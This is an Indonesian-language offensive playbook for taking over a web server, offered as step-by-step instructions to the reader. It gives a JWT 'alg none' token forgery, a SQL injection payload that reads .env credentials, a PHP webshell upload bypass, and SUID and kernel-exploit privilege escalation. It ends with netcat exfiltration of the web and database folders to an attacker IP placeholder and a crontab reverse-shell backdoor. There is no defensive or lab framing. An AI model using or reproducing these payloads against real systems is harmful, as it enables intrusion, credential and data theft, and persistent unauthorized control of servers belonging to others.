TOTAL SYSTEM TAKEOVER
[PHASE 01] BROKEN AUTHENTICATION & TOKEN FORGERY
Tujuan: Masuk ke akun siapa pun tanpa password.
Teknik: Mencari JWT (JSON Web Token) yang lemah atau tidak terverifikasi.
# 1. Tangkap Token Bearer saat Login
# 2. Cek apakah server memvalidasi signature.
# 3. Ganti "alg": "HS256" menjadi "alg": "none" (None Algorithm Attack)
# 4. Ganti isi payload: {"user": "admin", "role": "superuser"}
# 5. Kirim kembali tanpa signature.
Hasil: Kamu login sebagai Admin Pusat tanpa perlu tahu password-nya.
[PHASE 02] MASSIVE DATA DUMPING (BEYOND SQLMAP)
Tujuan: Menguras seluruh isi harddisk database secara instan.
Teknik: Menggunakan In-Band SQLi untuk membaca file sistem.
# Gunakan fungsi 'LOAD_FILE' untuk membaca konfigurasi server
' UNION SELECT 1, LOAD_FILE('/var/www/html/.env'), 3, 4 --
# Jika tembus, kamu akan melihat:
DB_PASSWORD=P@ssw0rd_Rahasia_Banget
AWS_SECRET=AKIA...
[Image of a SQL injection vulnerability diagram showing data exfiltration via UNION SELECT]
[PHASE 03] GAINING SHELL (RCE VIA FILE UPLOAD)
Tujuan: Menjalankan perintah terminal Ubuntu langsung dari browser.
Teknik: Mem-bypass filter upload gambar untuk memasukkan Webshell.
# 1. Siapkan file: shell.php.jpg (Double Extension)
# 2. Isi file: <?php system($_GET['cmd']); ?>
# 3. Bypass Content-Type: image/jpeg
# 4. Akses lewat browser: https://target.com/uploads/shell.php.jpg?cmd=ls -la
Hasil: Kamu punya kontrol penuh atas folder web server.
[PHASE 04] PRIVILEGE ESCALATION TO ROOT
Tujuan: Menjadi Penguasa Tertinggi (Root) di server Linux.
Teknik: Mencari celah Kernel atau SUID binary yang salah setting.
# Di dalam shell tadi, cek versi Linux:
uname -a
# Cari file dengan akses SUID:
find / -perm -4000 -type f 2>/dev/null
# Eksekusi exploit kernel (misal: DirtyPipe atau PwnKit)
./exploit_root
whoami -> root
[Image of a privilege escalation attack flow from a low-privileged user to root]
[PHASE 05] DATA EXFILTRATION & PERSISTENCE
Tujuan: Mengirim data ke servermu dan membuat pintu belakang permanen.
# Kompres seluruh folder web dan database
tar -cvf backup_total.tar /var/www/html /var/lib/mysql
# Kirim ke servermu lewat Netcat:
nc -w 3 [IP_KAMU] [PORT_KAMU] < backup_total.tar
# Tanam Backdoor di Crontab (Jalan otomatis tiap jam)
echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/[IP_KAMU]/4444 0>&1'" >> /etc/crontab
TOTAL COMPROMISE: SYSTEM IS YOURS.